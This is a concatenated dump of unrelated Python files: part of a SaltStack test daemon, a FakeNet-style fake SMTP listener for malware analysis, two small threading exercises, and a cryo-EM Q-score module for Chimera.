                log.error('self.sub_minion_process cannot be terminated.')
except AttributeError:
pass
try:
if hasattr(self.minion_process, 'terminate'):
self.minion_process.terminate()
else:
                log.error('self.minion_process cannot be terminated.')
except AttributeError:
pass
if hasattr(self, 'proxy_process'):
self.proxy_process.terminate()
try:
if hasattr(self.master_process, 'terminate'):
self.master_process.terminate()
else:
                log.error('self.master_process cannot be terminated.')
except AttributeError:
pass
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
self._exit_mockbin()
self._exit_ssh()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
# Shutdown the log server
self.log_server.shutdown()
self.log_server.server_close()
self.log_server_process.join()
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
'''
Minions setup routines
'''
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, 'sshd_process'):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
'''
Clean out the tmp files
'''
def remove_readonly(func, path, excinfo):
if os.path.exists(path):
# Give full permissions to owner
os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (TMP, RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE, RUNTIME_VARS.TMP_PRODENV_STATE_TREE):
if os.path.isdir(dirname):
try:
shutil.rmtree(six.text_type(dirname), onerror=remove_readonly)
except Exception:
log.exception('Failed to remove directory: %s', dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
if not running and job_finished is False:
                # Let's not have false positives and wait one more second
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
'\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', tgt_type='list'
)
return [
k for (k, v) in six.iteritems(running) if v and v[0]['jid'] == jid
]
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
'(saltutil.sync_{1})'.format(
', '.join(targets),
modules_kind,
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_{0}'.format(modules_kind),
tgt_type='list',
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. '
'Tests requiring these {0} WILL fail'.format(
modules_kind, **self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output['ret'], six.string_types):
                        # An error has occurred
print(
' {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: '
'{1}'.format(
name, output['ret'],
modules_kind,
**self.colors)
)
return False
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
'{1}'.format(
name,
', '.join(output['ret']),
modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {LIGHT_RED}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionStates')
self.sync_minion_modules_('states', targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionModules')
self.sync_minion_modules_('modules', targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionGrains')
self.sync_minion_modules_('grains', targets, timeout=timeout)
def wait_for_minions(self, start, timeout, sleep=5):
'''
Ensure all minions and masters (including sub-masters) are connected.
'''
while True:
try:
ret = self.client.run_job('*', 'test.ping')
except salt.exceptions.SaltClientError:
ret = None
if ret and 'minions' not in ret:
continue
if ret and sorted(ret['minions']) == sorted(self.minion_targets):
break
if time.time() - start >= timeout:
raise RuntimeError("Ping Minions Failed")
time.sleep(sleep)
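# Editor's usage sketch (illustrative only): TestDaemon implements
# __enter__/__exit__ and is meant to wrap a test run as a context manager, e.g.
#
#     with TestDaemon(parser) as daemon:
#         daemon.client.cmd('minion', 'test.ping')
#
# __enter__ starts the master/minion/syndic daemons and waits for the minions to
# connect; __exit__ terminates them and shuts down the log server.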
|
SMTPListener.py
|
import logging
import sys
import os
import threading
import socketserver
import ssl
import socket
from . import *
class SMTPListener(object):
def taste(self, data, dport):
# Once the TCP connection has been established, the server initiates
# the conversation with '220' message. However, if the client connects
# to a nonstandard port there is no way for the proxy to know that
# SMTP is the protocol until the client sends a message.
commands = ['HELO', 'EHLO', 'MAIL FROM', 'RCPT TO', 'TURN', 'ATRN',
'SIZE', 'ETRN', 'PIPELINING', 'CHUNKING', 'DATA', 'DSN',
'RSET', 'VRFY', 'HELP', 'QUIT', 'X-EXPS GSSAPI',
'X-EXPS=LOGIN', 'X-EXCH50', 'X-LINK2STATE']
ports = [25, 587, 465]
confidence = 1 if dport in ports else 0
for command in commands:
if data.lstrip().startswith(command):
confidence += 2
continue
return confidence
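    # Editor's note (worked example): a probe that connects on port 587 and
    # sends "EHLO example.com" scores 1 (well-known SMTP port) + 2 (EHLO verb)
    # = 3, whereas unrelated traffic on port 8080 that matches no SMTP verb
    # scores 0.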
def __init__(
self,
config,
name='SMTPListener',
logging_level=logging.INFO,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = config.get('ipaddr')
self.server = None
self.name = 'SMTP'
self.port = self.config.get('port', 25)
self.logger.debug('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.items():
self.logger.debug(' %10s: %s', key, value)
def start(self):
self.logger.debug('Starting...')
self.server = ThreadedTCPServer((self.local_ip, int(self.config['port'])), ThreadedTCPRequestHandler)
if self.config.get('usessl') == 'Yes':
self.logger.debug('Using SSL socket')
            keyfile_rel = 'listeners/ssl_utils/privkey.pem'
            keyfile_path = ListenerBase.abs_config_path(keyfile_rel)
            if keyfile_path is None:
                # Report the relative path that was searched for, not the failed (None) result
                self.logger.error('Could not locate %s', keyfile_rel)
                sys.exit(1)
            certfile_rel = 'listeners/ssl_utils/server.pem'
            certfile_path = ListenerBase.abs_config_path(certfile_rel)
            if certfile_path is None:
                self.logger.error('Could not locate %s', certfile_rel)
                sys.exit(1)
            # Use the resolved paths rather than bare filenames in the working directory
            self.server.socket = ssl.wrap_socket(self.server.socket, keyfile=keyfile_path, certfile=certfile_path, server_side=True, ciphers='RSA')
self.server.logger = self.logger
self.server.config = self.config
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.debug('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
# Timeout connection to prevent hanging
self.request.settimeout(int(self.server.config.get('timeout', 5)))
        try:
            banner = self.server.config.get('banner', "220 FakeNet SMTP Service Ready")
            # Responses are sent as bytes and incoming data is decoded, so the
            # string comparisons below work with Python 3's socketserver
            self.request.sendall(("%s\r\n" % banner).encode())
            while True:
                data = self.request.recv(4096).decode('utf-8', errors='replace')
                for line in data.split("\n"):
                    self.server.logger.debug(line)
                command = data[:4].upper()
                if command == '':
                    break
                elif command in ['HELO', 'EHLO']:
                    self.request.sendall(b"250 evil.com\r\n")
                elif command in ['MAIL', 'RCPT', 'NOOP', 'RSET']:
                    self.request.sendall(b"250 OK\r\n")
                elif command == 'QUIT':
                    self.request.sendall(b"221 evil.com bye\r\n")
                elif command == 'DATA':
                    self.request.sendall(b"354 start mail input, end with <CRLF>.<CRLF>\r\n")
                    mail_data = ""
                    while True:
                        mail_data_chunk = self.request.recv(4096)
                        if not mail_data_chunk:
                            break
                        mail_data += mail_data_chunk.decode('utf-8', errors='replace')
                        if "\r\n.\r\n" in mail_data:
                            break
                    self.server.logger.info('Received mail data.')
                    for line in mail_data.split("\n"):
                        self.server.logger.info(line)
                    self.request.sendall(b"250 OK\r\n")
                else:
                    self.request.sendall(b"503 Command not supported\r\n")
except socket.timeout:
self.server.logger.warning('Connection timeout')
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception as e:
self.server.logger.error('Error: %s', e)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
###############################################################################
# Testing code
def test(config):
import smtplib
logger = logging.getLogger('SMTPListenerTest')
server = smtplib.SMTP_SSL('localhost', config.get('port', 25))
message = "From: test@test.com\r\nTo: test@test.com\r\n\r\nTest message\r\n"
logger.info('Testing email request.')
logger.info('-'*80)
server.set_debuglevel(1)
server.sendmail('test@test.com','test@test.com', message)
server.quit()
logger.info('-'*80)
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '25', 'usessl': 'Yes', 'timeout': 10 }
listener = SMTPListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
test(config)
if __name__ == '__main__':
main()
|
13_exercise_26.py
|
# -*- coding: utf-8 -*-
import threading
# Create a global ThreadLocal object:
local_school = threading.local()
def process_student():
    # Get the student bound to the current thread:
std = local_school.student
print('Hello, %s (in %s)' % (std, threading.current_thread().name))
def process_thread(name):
    # Bind the ThreadLocal student for this thread:
local_school.student = name
process_student()
t1 = threading.Thread(target=process_thread, args=('Alice',), name='Thread-A')
t2 = threading.Thread(target=process_thread, args=('Bob',), name='Thread-B')
t1.start()
t2.start()
t1.join()
t2.join()
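# Expected output, assuming both threads run to completion (ordering may vary
# with thread scheduling):
#   Hello, Alice (in Thread-A)
#   Hello, Bob (in Thread-B)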
|
PT_test.py
|
import cmd, sys, time
import datetime
from BDM import *
from threading import Thread, Event, RLock, Condition
# https://medium.com/greedygame-engineering/an-elegant-way-to-run-periodic-tasks-in-python-61b7c477b679
class PT(Thread):
def __init__(self, dt, hFunction, lock):
Thread.__init__(self)
self.daemon = True
self.stopped = Event()
self.dt = dt
self.execute = hFunction
self.lock = lock
self.prev = datetime.datetime.now()
def stop(self):
self.stopped.set()
self.join()
def run(self):
while not self.stopped.wait(self.dt):
while self.lock.is_set():
self.lock.wait()
self.lock.clear()
self.execute()
curr = datetime.datetime.now()
print("Time diff: " + str(curr-self.prev))
self.prev = curr
self.lock.set()
def msg():
print("WTD")
lock = Event()
wtd = PT(.1, msg, lock)
wtd.start()
def thr():
time.sleep(2)
print("Waited 2 s")
print(lock == wtd.lock)
for _ in range(20):
lock.clear()
# t1 = Thread(target=thr).start()
thr()
lock.set()
|
qscores.py
|
# Copyright (c) 2020 Greg Pintilie - gregp@slac.stanford.edu
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import numpy
import _multiscale
from CGLutil.AdaptiveTree import AdaptiveTree
import chimera
import FitMap
import os
import Matrix
import VolumeData
chargedIons = { "MG":2, "NA":1, "CL":-1, "CA":2, "ZN":2, "MN":2, "FE":3, "CO":2, "NI":2 }
# returns the min and max density value in a map
def MinMaxD ( dmap ) :
# dmap - the map
M = dmap.data.full_matrix()
maxM = numpy.max(M)
minM = numpy.min(M)
maxD = min ( numpy.average(M)+numpy.std(M)*10, maxM )
minD = max ( numpy.average(M)-numpy.std(M)*1, minM )
# xray
#maxD = min ( numpy.average(M)+numpy.std(M)*3.5, maxM )
#minD = max ( numpy.average(M)-numpy.std(M)*0.77, minM )
#print "%s - %.2f->%.2f, %.2f->%.2f" % (dmap.name, minD, maxD, minM, maxM )
#minD = numpy.min(M)
#minD, maxD = numpy.min(M), numpy.max(M)
return minD, maxD
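# Note: the range returned above is clamped to avg - 1*std and avg + 10*std of
# the full matrix, so a few extreme voxels do not stretch the reference
# Gaussian used by the Q-score functions below.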
# this method calculates CC between radial points placed around the atoms and the map
# - two values are returned - basic CC and CC about the mean - the latter is the Q-score
def Qscore ( atoms, dmap, sigma, allAtTree = None, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.5, minD=None, maxD=None, fitg=0, mol=None ) :
if minD == None or maxD == None :
minD, maxD = MinMaxD (dmap)
#sigma = 1.0
if len(atoms) == 0 :
#print " - no RAD atoms?"
return None
from _multiscale import get_atom_coordinates
pts = get_atom_coordinates(atoms, transformed = False)
#print " __%s__ " % (atoms[0].name), pts[0]
A, B = maxD - minD, minD
refG = A * numpy.exp ( -0.5 * numpy.power(0.0/sigma,2) ) + B
#print " - refg: ", refG
# g_vals should have the reference gaussian...
g_vals = (numpy.ones ( [len(pts)*numPts,1] ) * refG).astype(numpy.float64, copy=False)
g_vals_avg = numpy.array ( [refG] ).astype(numpy.float64, copy=False)
if mol == None :
mol = atoms[0].molecule
# r_avg holds the average values and number of points at each radial distance
d_vals = dmap.interpolated_values ( pts, mol.openState.xform ).astype(numpy.float64, copy=False)
d_vals = numpy.repeat ( d_vals, numPts )
avgV = numpy.average ( d_vals )
r_avg = [ [0,avgV,len(pts)*numPts] ]
d_vals_avg = numpy.array ( [avgV] ).astype(numpy.float64, copy=False)
# make smaller atom tree...
if 1 and allAtTree != None :
ats_near = []
for at in atoms :
anear = allAtTree.searchTree ( at.coord().data(), toRAD*2.0 )
ats_near.extend ( anear )
points = _multiscale.get_atom_coordinates ( ats_near, transformed = False )
if log :
print " - new search tree: %d pts" % ( len(ats_near) )
allAtTree = AdaptiveTree ( points.tolist(), ats_near, 1.0)
#olap, corr1, corr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
#dRAD, toRAD, RAD = 0.2, 1.8, 0.1
RAD = dRAD
i = 1.0
while RAD < toRAD + 0.01 :
outRad = RAD*0.9
outRad2 = outRad * outRad
#outRad2 = outRad * outRad
pts = []
for at in atoms :
#npts = numPts # 8 # int ( npts )
npts = int (numPts * RAD*RAD / (dRAD*dRAD)) if show else numPts
#npts = numPts * (RAD*RAD / (dRAD*dRAD))
#print RAD, dRAD, numPts, " -> ", npts
for i in range (0, 100) :
outPts = SpherePts ( at.coord(), RAD, npts+i*2 )
at_pts, at_pts_i = [None]*len(outPts), 0
for pt in outPts :
vPt = [pt[0], pt[1], pt[2]]
apt = numpy.array ( vPt )
if allAtTree != None :
opointsNear = allAtTree.searchTree ( vPt, outRad )
if 1 :
foundNearPt = False
for npt in opointsNear :
v = apt - npt.coord().data()
r2 = numpy.sum ( v * v )
if r2 < outRad2 :
foundNearPt = True
break
if not foundNearPt :
at_pts[at_pts_i] = vPt
at_pts_i += 1
else :
if len(opointsNear) == 0 :
at_pts[at_pts_i] = vPt
at_pts_i += 1
else :
at_pts[at_pts_i] = vPt
at_pts_i += 1
#if log :
# print " - %d, %d pts" % (i, len(at_pts))
if at_pts_i >= npts or i >= 95 : # or show :
pts.extend ( at_pts[0:at_pts_i] )
break
if show :
AddSpherePts ( pts, (.6,.6,.6,0.4), 0.1, "RAD points %.1f %s" % (RAD,atoms[0].name) )
if len (pts) < 1 :
if log :
print " - no points for RAD %.1f - %d.%s - " % (RAD, atoms[0].residue.id.position, atoms[0].residue.type),
print "SC" if atoms[0].isSC else "BB"
r_avg.append ( [RAD,0,0] )
else :
d_vals_n = dmap.interpolated_values ( pts, mol.openState.xform )
d_vals = numpy.append ( d_vals, d_vals_n )
avg = numpy.average ( d_vals_n )
#gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
#A, B = GV, 0
#A, B = GV - minD, minD
A,B = maxD - minD, minD
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
g_vals = numpy.append ( g_vals, numpy.ones([len(pts),1]) * gv )
g_vals_avg = numpy.append ( g_vals_avg, gv )
d_vals_avg = numpy.append ( d_vals_avg, avg )
r_avg.append ( [RAD,avg,len(pts)] )
#if log :
# print "%.1f\t%f\t%f\t%d" % (RAD, avg, gv, len(pts))
RAD += dRAD
i+=1
if log and not fitg :
min, max = r_avg[0][1], r_avg[0][1]
for RAD, avg, numPts in r_avg :
if avg < min : min = avg
if avg > max : max = avg
A,B = max-min, min
#A,B = maxD - minD, minD
#A,B = GV - minD, minD
for RAD, avg, numPts in r_avg :
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
#print "%.1f\t%f\t%f\t%d" % (RAD, avg+0.02, gv+0.02, numPts)
print "%.1f\t%f\t%f\t%d" % (RAD, avg, gv, numPts)
#d_vals = d_vals + 0.02
#g_vals = g_vals + 0.02
    # this is the CC between averaged radial values - not as robust
    if 0 :
        olap, CC, CCmean = FitMap.overlap_and_correlation ( d_vals_avg, g_vals_avg )
        if log :
            print "olap -avg-: %.3f cc: %.3f, Q: %.3f -- %d" % (olap, CC, CCmean, len(d_vals_avg))
            #print "%f\t%f\t%f" % (olap, CC, CCmean)
olap, CC, CCmean = FitMap.overlap_and_correlation ( d_vals, g_vals )
# this is the CC between _all_ radial values
Qs = CCmean
if log :
print "olap --N--: %.3f cc: %.3f, ccmean (Q-score): %.3f -- %d" % (olap, CC, Qs, len(d_vals))
#print "%f\t%f\t%f" % (olap, CC, Qs)
if fitg :
if log : print "fitting gaussian : "
#V, N = [ [x[0],x[1]] for x in r_avg ], float(len(r_avg))
V, N = [ [x[0],x[1]] for x in r_avg[0:25] ], float(25)
sdev, A, B = optSGD ( V, 5000, 1.0 )
sdev, A, B = optSGD ( V, 5000, 0.1, sdev, A, B )
err = numpy.sqrt(err3(V,sdev,A,B)/N)
if log : print " sgd - sdev: %.4f, A %.4f, B %.4f, err: %f" % (sdev, A, B, err)
sdev2, A2, B2 = optGN ( V, 0.0001, sdev, A, B )
if sdev2 != None :
sdev, A, B = sdev2, A2, B2
err = numpy.sqrt(err3(V,sdev,A,B)/N)
#print "max:", r_avg[0][1]
errp = err / r_avg[0][1] * 100.0
if log : print " gn - sdev: %.4f, A %.4f, B %.4f, err: %f (%.1f%%)" % (sdev, A, B, err, errp)
yds, i = numpy.zeros ( len(r_avg) ), 0
for x, y, n in r_avg:
gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
#yds[i] = y - gv
yds[i] = y
if log : print "%.1f\t%f\t%f" % (x, y, gv)
i += 1
return Qs, yds, err
else :
return Qs
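# Typical call pattern for Qscore (a sketch; CalcQ further below does the real
# loop over atoms): the map range is computed once and reused per atom, e.g.
#   minD, maxD = MinMaxD ( dmap )
#   q = Qscore ( [at], dmap, sigma, allAtTree=allAtTree, numPts=8,
#                toRAD=2.0, dRAD=0.1, minD=minD, maxD=maxD )
# where 'at' and 'dmap' stand for an open Chimera atom and volume.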
# this is an older Q-score function; it does not try to ensure that numPts points are placed around each atom
def Qscore_ ( atoms, dmap, sigma, allAtTree = None, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.5, minD=None, maxD=None, fitg=0, mol=None ) :
if minD == None or maxD == None :
minD, maxD = MinMaxD (dmap)
#sigma = 1.0
if len(atoms) == 0 :
#print " - no RAD atoms?"
return None
from _multiscale import get_atom_coordinates
pts = get_atom_coordinates(atoms, transformed = False)
#print " __%s__ " % (atoms[0].name), pts[0]
A, B = maxD - minD, minD
refG = A * numpy.exp ( -0.5 * numpy.power(0.0/sigma,2) ) + B
#print " - refg: ", refG
# g_vals should have the reference gaussian...
g_vals_avg = numpy.array ( [refG] ).astype(numpy.float64, copy=False)
if mol == None :
mol = atoms[0].molecule
# r_avg holds the average values and number of points at each radial distance
d_vals = dmap.interpolated_values ( pts, mol.openState.xform ).astype(numpy.float64, copy=False)
d_vals = numpy.repeat ( d_vals, numPts )
avgV = numpy.average ( d_vals )
r_avg = [ [0,avgV,len(pts)*numPts] ]
d_vals_avg = numpy.array ( [avgV] ).astype(numpy.float64, copy=False)
# make smaller atom tree...
if 1 and allAtTree != None :
ats_near = []
for at in atoms :
anear = allAtTree.searchTree ( at.coord().data(), toRAD*2.0 )
ats_near.extend ( anear )
points = _multiscale.get_atom_coordinates ( ats_near, transformed = False )
if log :
print " - new search tree: %d pts" % ( len(ats_near) )
allAtTree = AdaptiveTree ( points.tolist(), ats_near, 1.0)
#olap, corr1, corr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
#dRAD, toRAD, RAD = 0.2, 1.8, 0.1
RAD = dRAD
i = 1.0
while RAD < toRAD + 0.01 :
outRad = RAD*0.9
outRad2 = outRad * outRad
#outRad2 = outRad * outRad
pts = []
for at in atoms :
outPts = SpherePts ( at.coord(), RAD, numPts )
at_pts, at_pts_i = [None]*len(outPts), 0
for pt in outPts :
vPt = [pt[0], pt[1], pt[2]]
apt = numpy.array ( vPt )
if allAtTree != None :
opointsNear = allAtTree.searchTree ( vPt, outRad )
if 1 :
foundNearPt = False
for npt in opointsNear :
v = apt - npt.coord().data()
r2 = numpy.sum ( v * v )
if r2 < outRad2 :
foundNearPt = True
break
if not foundNearPt :
at_pts[at_pts_i] = vPt
at_pts_i += 1
else :
if len(opointsNear) == 0 :
at_pts[at_pts_i] = vPt
at_pts_i += 1
else :
at_pts[at_pts_i] = vPt
at_pts_i += 1
pts.extend ( at_pts[0:at_pts_i] )
if show :
AddSpherePts ( pts, (.6,.6,.6,0.4), 0.1, "RAD points %.1f" % RAD )
if len (pts) < 1 :
if 0 and log :
print " - no points for RAD %.1f - %d.%s - " % (RAD, atoms[0].residue.id.position, atoms[0].residue.type),
print "SC" if atoms[0].isSC else "BB"
r_avg.append ( [RAD,0,0] )
else :
d_vals_n = dmap.interpolated_values ( pts, mol.openState.xform )
#d_vals = numpy.append ( d_vals, d_vals_n )
avg = numpy.average ( d_vals_n )
A,B = maxD - minD, minD
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
g_vals_avg = numpy.append ( g_vals_avg, gv )
d_vals_avg = numpy.append ( d_vals_avg, avg )
r_avg.append ( [RAD,avg,len(pts)] )
RAD += dRAD
i+=1
if 0 and log :
min, max = r_avg[0][1], r_avg[0][1]
for RAD, avg, numPts in r_avg :
if avg < min : min = avg
if avg > max : max = avg
A,B = max-min, min
A,B = maxD - minD, minD
#A,B = GV - minD, minD
for RAD, avg, numPts in r_avg :
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
#print "%.1f\t%f\t%f\t%d" % (RAD, avg+0.02, gv+0.02, numPts)
print "%.1f\t%f\t%f\t%d" % (RAD, avg, gv, numPts)
#d_vals = d_vals + 0.02
#g_vals = g_vals + 0.02
olap, CC, CCm = FitMap.overlap_and_correlation ( d_vals_avg, g_vals_avg )
Qscore = CCm
if log :
print "olap -avg-: %.3f cc: %.3f, ccm (Q-score): %.3f -- %d" % (olap, CC, CCm, len(d_vals_avg))
#print "%f\t%f\t%f" % (olap, CC, CCm)
if fitg :
if log : print "fitting gaussian : "
#V, N = [ [x[0],x[1]] for x in r_avg ], float(len(r_avg))
V, N = [ [x[0],x[1]] for x in r_avg[0:15] ], float(15)
sdev, A, B = optSGD ( V, 5000, 1.0 )
sdev, A, B = optSGD ( V, 5000, 0.1, sdev, A, B )
err = numpy.sqrt(err3(V,sdev,A,B)/N)
if log : print " sgd - sdev: %.4f, A %.4f, B %.4f, err: %f" % (sdev, A, B, err)
sdev2, A2, B2 = optGN ( V, 0.0001, sdev, A, B )
if sdev2 != None :
sdev, A, B = sdev2, A2, B2
err = numpy.sqrt(err3(V,sdev,A,B)/N)
print "max:", r_avg[0][1]
errp = err / r_avg[0][1] * 100.0
if log : print " gn - sdev: %.4f, A %.4f, B %.4f, err: %f (%.1f%%)" % (sdev, A, B, err, errp)
yds, i = numpy.zeros ( len(r_avg) ), 0
for x, y, n in r_avg:
gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
#yds[i] = y - gv
yds[i] = y
if log : print "%.1f\t%f\t%f" % (x, y, gv)
i += 1
return Qscore, yds, err
else :
return Qscore
def QscorePt ( atPt, xfI, dmap, sigma, allAtTree = None, log=0, numPts=8, toRAD=2.0, dRAD=0.5, minD=None, maxD=None, fitg=0 ) :
if minD == None or maxD == None :
minD, maxD = MinMaxD (dmap)
#xfI = chimera.Xform()
atPtC = chimera.Point ( *atPt )
A, B = maxD - minD, minD
refG = A * numpy.exp ( -0.5 * numpy.power(0.0/sigma,2) ) + B
#print " - refg: ", refG
# g_vals should have the reference gaussian...
g_vals = (numpy.ones ( [numPts,1] ) * refG).astype(numpy.float64, copy=False )
g_vals_avg = numpy.array ( [refG] ).astype(numpy.float64, copy=False )
# r_avg holds the average values and number of points at each radial distance
d_vals = dmap.interpolated_values ( [atPt], xfI ).astype(numpy.float64, copy=False)
d_vals = numpy.repeat ( d_vals, numPts )
avgV = numpy.average ( d_vals )
r_avg = [ [0,avgV,numPts] ]
d_vals_avg = numpy.array ( [avgV] ).astype(numpy.float64, copy=False)
# make smaller atom tree...
if 1 and allAtTree != None :
ats_near = []
anear = allAtTree.searchTree ( atPt, toRAD*2.0 )
ats_near.extend ( anear )
points = _multiscale.get_atom_coordinates ( ats_near, transformed = False )
if log :
print " - new search tree: %d pts" % ( len(ats_near) )
allAtTree = AdaptiveTree ( points.tolist(), ats_near, 1.0)
#olap, corr1, corr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
#dRAD, toRAD, RAD = 0.2, 1.8, 0.1
RAD = dRAD
i = 1.0
while RAD < toRAD + 0.01 :
outRad = RAD*0.9
outRad2 = outRad * outRad
#outRad2 = outRad * outRad
pts = []
for i in range (0, 100) :
outPts = SpherePts ( atPtC, RAD, numPts+i*2 )
at_pts, at_pts_i = [None]*len(outPts), 0
for pt in outPts :
vPt = [pt[0], pt[1], pt[2]]
apt = numpy.array ( vPt )
if allAtTree != None :
opointsNear = allAtTree.searchTree ( vPt, outRad )
foundNearPt = False
for npt in opointsNear :
v = apt - npt.coord().data()
r2 = numpy.sum ( v * v )
if r2 < outRad2 :
foundNearPt = True
break
if not foundNearPt :
at_pts[at_pts_i] = vPt
at_pts_i += 1
else :
at_pts[at_pts_i] = vPt
at_pts_i += 1
#if log :
# print " - %d, %d pts" % (i, len(at_pts))
if at_pts_i >= numPts or i >= 15 : # or show :
pts.extend ( at_pts[0:at_pts_i] )
break
if len (pts) < 1 :
            if log :
                # there is no atom object here (QscorePt scores a bare point), so just report the radius
                print " - no points for RAD %.1f" % RAD
r_avg.append ( [RAD,0,0] )
else :
d_vals_n = dmap.interpolated_values ( pts, xfI )
d_vals = numpy.append ( d_vals, d_vals_n )
avg = numpy.average ( d_vals_n )
#gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
#A, B = GV, 0
#A, B = GV - minD, minD
A,B = maxD - minD, minD
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
g_vals = numpy.append ( g_vals, numpy.ones([len(pts),1]) * gv )
g_vals_avg = numpy.append ( g_vals_avg, gv )
d_vals_avg = numpy.append ( d_vals_avg, avg )
r_avg.append ( [RAD,avg,len(pts)] )
#if log :
# print "%.1f\t%f\t%f\t%d" % (RAD, avg, gv, len(pts))
RAD += dRAD
i+=1
if log and not fitg :
min, max = r_avg[0][1], r_avg[0][1]
for RAD, avg, numPts in r_avg :
if avg < min : min = avg
if avg > max : max = avg
A,B = max-min, min
#A,B = maxD - minD, minD
#A,B = GV - minD, minD
for RAD, avg, numPts in r_avg :
gv = A * numpy.exp ( -0.5 * numpy.power(RAD/sigma,2) ) + B
